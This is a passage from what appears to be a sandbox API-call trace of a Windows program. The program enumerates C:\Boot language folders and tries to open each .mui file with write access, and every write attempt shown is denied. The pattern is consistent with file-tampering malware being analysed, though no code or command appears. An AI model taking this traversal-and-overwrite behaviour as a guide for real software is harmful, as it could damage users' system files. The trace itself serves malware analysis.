Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0082.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.764] AreFileApisANSI () returned 1 [0082.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\cs-CZ\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\cs-CZ\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.765] AreFileApisANSI () returned 1 [0082.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0082.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 30 [0082.765] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.765] GetFileType (hFile=0x430) returned 0x1 [0082.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.765] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.765] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.766] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.766] CloseHandle (hObject=0x430) returned 1 [0082.766] AreFileApisANSI () returned 1 [0082.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0082.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 30 [0082.766] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.766] GetLastError () returned 0x5 [0082.766] GetLastError () returned 0x5 [0082.766] SetLastError (dwErrCode=0x5) [0082.766] GetLastError () returned 0x5 [0082.766] SetLastError (dwErrCode=0x5) [0082.766] GetLastError () returned 0x5 [0082.766] SetLastError (dwErrCode=0x5) [0082.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.767] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧놠")) returned 0 [0082.767] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0082.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0082.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.767] AreFileApisANSI () returned 1 [0082.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\da-DK", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\da-DK", lpUsedDefaultChar=0x0) returned 14 [0082.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.768] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0082.768] AreFileApisANSI () returned 1 [0082.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88798 [0082.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88798, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\da-DK") returned 14 [0082.768] CreateFileW (lpFileName="C:\\Boot\\da-DK" (normalized: "c:\\boot\\da-dk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.768] GetLastError () returned 0x5 [0082.768] GetLastError () returned 0x5 [0082.768] SetLastError (dwErrCode=0x5) [0082.768] GetLastError () returned 0x5 [0082.768] SetLastError (dwErrCode=0x5) [0082.768] GetLastError () returned 0x5 [0082.768] SetLastError (dwErrCode=0x5) [0082.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.768] AreFileApisANSI () returned 1 [0082.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0082.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\da-DK") returned 14 [0082.768] CreateFileW (lpFileName="C:\\Boot\\da-DK" (normalized: "c:\\boot\\da-dk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.769] GetLastError () returned 0x5 [0082.769] GetLastError () returned 0x5 [0082.769] SetLastError (dwErrCode=0x5) [0082.769] GetLastError () returned 0x5 [0082.769] SetLastError (dwErrCode=0x5) [0082.769] GetLastError () returned 0x5 [0082.769] SetLastError (dwErrCode=0x5) [0082.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.769] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0082.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.769] FindFirstFileExW (in: lpFileName="C:\\Boot\\da-DK\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77fd0 [0082.769] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.769] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0082.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.770] AreFileApisANSI () returned 1 [0082.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\da-DK\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.771] AreFileApisANSI () returned 1 [0082.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0082.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 30 [0082.771] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.771] GetFileType (hFile=0x430) returned 0x1 [0082.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.771] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.771] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.771] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.772] CloseHandle (hObject=0x430) returned 1 [0082.772] AreFileApisANSI () returned 1 [0082.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0082.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 30 [0082.772] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.772] GetLastError () returned 0x5 [0082.772] GetLastError () returned 0x5 [0082.772] SetLastError (dwErrCode=0x5) [0082.772] GetLastError () returned 0x5 [0082.772] SetLastError (dwErrCode=0x5) [0082.772] GetLastError () returned 0x5 [0082.772] SetLastError (dwErrCode=0x5) [0082.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0082.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.772] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0082.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0082.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 